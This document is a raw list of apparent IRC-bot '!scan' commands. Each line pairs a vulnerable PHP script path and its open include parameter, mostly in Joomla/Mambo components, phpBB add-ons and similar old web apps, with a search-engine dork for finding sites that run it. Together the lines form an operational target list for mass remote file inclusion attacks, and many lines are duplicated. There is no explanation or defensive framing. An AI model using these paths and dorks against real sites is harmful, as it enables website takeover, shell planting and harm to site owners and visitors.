!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= "AllMyGuests"
!scan /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= "com_rsgallery"
!scan /components/com_smf/smf.php?mosConfig_absolute_path= "com_smf"
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
!scan administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= "com_peoplebook"
!scan /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"
!scan inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:br bp_ncom.php?bnrep= "Script r?alis? par BinGo PHP"
!scan /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= "/com_mtree/"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" "chat_exemple.php"
!scan /popup_window.php?site_isp_root= "Squirrelcart"
!scan /yabbse/Sources/Packages.php?sourcedir= Yabbse
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/ site:fr
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/ site:us
!scan /includes/functions_portal.php?phpbb_root_path= "powered by Integramod"
!scan /surveys/survey.inc.php?path= surveys
!scan index.php?body= "index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= adobt site:us
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= "mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms" site:.ar
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= "com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"
!scan /main.php?sayfa= "main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= "/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= .com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
!scan /tools/send_reminders.php?includedir=
!scan module_db.php?pivot_path= "module_db.php?pivot_path="
!scan /classes/adodbt/sql.php?classes_dir= "/classes/adodbt/sql.php?classes_dir="
!scan inc/cmses/aedatingCMS.php?dir[inc]= "flashchat"
!scan /modules/vwar/admin/admin.php?vwar_root= vwar
!scan bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= forum
!scan components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
!scan com_extended_registration
!scan index.php?RP_PATH= reviewpost
!scan index.php?pagename= phpquiz
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/
!scan smarty_config.php?root_dir= "smarty"
!scan /components/com_forum/download.php?phpbb_root_path= com_forum
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
!scan /classes/adodbt/sql.php?classes_dir= "index2.php?option=rss"
!scan send_reminders.php?includedir= "send_reminders.php?includedir="
!scan components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= com_rsgallery
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" index.php
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= "com_cpg"
!scan [Script Path]/admin/index.php?o= "admin/index.php";
!scan /admin/index.php?o= "admin/index.php";
!scan index.php?menu=deti&page= "index.php?menu=deti&page"
!scan /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan /components/com_simpleboard/image_upload.php?sbp= "com_simpleboard"
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
!scan components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
!scan admin/doeditconfig.php?thispath=../includes&config[path]= "admin"
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan /components/com_simpleboard/image_upload.php?sbp= "com_simpleboard"
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan wamp_dir/setup/yesno.phtml?no_url= "setup"
!scan components/com_simpleboard/image_upload.php?sbp= "com_simpleboard"
!scan /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
!scan smarty_config.php?root_dir= "smarty"
!scan /components/com_forum/download.php?phpbb_root_path= com_forum
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= "com_cpg"
!scan [Script Path]/admin/index.php?o= "admin/index.php"
!scan /admin/index.php?o= "admin/index.php"
!scan index.php?menu=deti&page= "index.php?menu=deti&page"
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter
!scan /classes/adodbt/sql.php?classes_dir= "index2.php?option=rss"
!scan send_reminders.php?includedir= "send_reminders.php?includedir="
!scan components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= com_rsgallery
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" index.php
!scan components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
!scan index.php?RP_PATH= reviewpost
!scan index.php?pagename= phpquiz
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/
!scan /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
!scan components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
!scan admin/doeditconfig.php?thispath=../includes&config[path]= "admin"
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"